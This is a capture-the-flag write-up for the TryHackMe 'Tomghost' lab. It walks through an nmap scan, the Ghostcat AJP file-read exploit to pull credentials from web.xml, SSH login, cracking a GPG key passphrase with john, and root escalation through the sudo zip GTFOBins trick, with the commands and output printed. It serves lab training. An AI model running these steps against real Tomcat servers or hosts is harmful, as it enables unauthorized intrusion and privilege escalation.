# CTF TryHackMe - Tomghost

## Nmap

```bash
nmap -sC -sV  -oN nmap.log 10.10.87.201 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 02:26 EDT
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 55.30% done; ETC: 02:26 (0:00:03 remaining)
Nmap scan report for 10.10.87.201
Host is up (0.063s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.77 seconds
```

Apache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to Ghostcat issue.
Once we find the desired ports highlighted in the results above you can head to this github exploit page: https://github.com/00theway/Ghostcat-CNVD-2020-10487. and run the python exploit.

## Using ajpShooter python script

```bash
python3 ajpShooter.py http://10.10.87.201:8080/ 8009 /WEB-INF read

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 302 302
[<] Location: /index.txt/
[<] Content-Length: 0
```

We are able to retrieve information. Try to retrieve files from the WEB-INF folder such as web.xml

```bash
python3 ajpShooter.py http://10.10.87.201:8080/ 8009 /WEB-INF/web.xml read
			
       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

Seems we have username and password (**skyfuck:8730281lkjlkjdqlksalks**). So let's try to ssh access.

## SSH Access

```bash
ssh skyfuck@10.10.87.201
```

And it's work !!
So, in the skyfuck's home see **credential.pgp** and **tryhackme.asc**

## Gpg decrypt

First, we need to import the private key
```bash
gpg --import tryhackme.asc
```

Secondly, try to decrypt the credential.pgp file
```bash
gpg --decrypt credential.pgp
```

Need passphrase, so use gpg2john to bruteforce passphrase

## Using gpg2john

Using scp to get private key in my attack machine (command launch on my attack machine)
```bash
scp skyfuck@10.10.87.201:/home/skyfuck/tryhackme.asc
```

Using gpg2john to get the hash
```bash
gpg2john tryhackme.asc > tryhackme.hash
```

Using john to crack the hash
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt tryhackme.hash 
alexandru        (tryhackme)
```

So, once the credential.pgp decrypted we obtain merlin's credentials
```
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
```

## SSH Access as merlin user

```bash
ssh merlin@10.10.87.201
```
Yes!! get access 

## Privilege Escalation

Check sudo permissions

```bash
sudo -l 
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```

Go to **https://gtfobins.github.io/** and search for **zip**

We can see to priv esc need to do this :
```bash
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
```

And we'rrrr root !
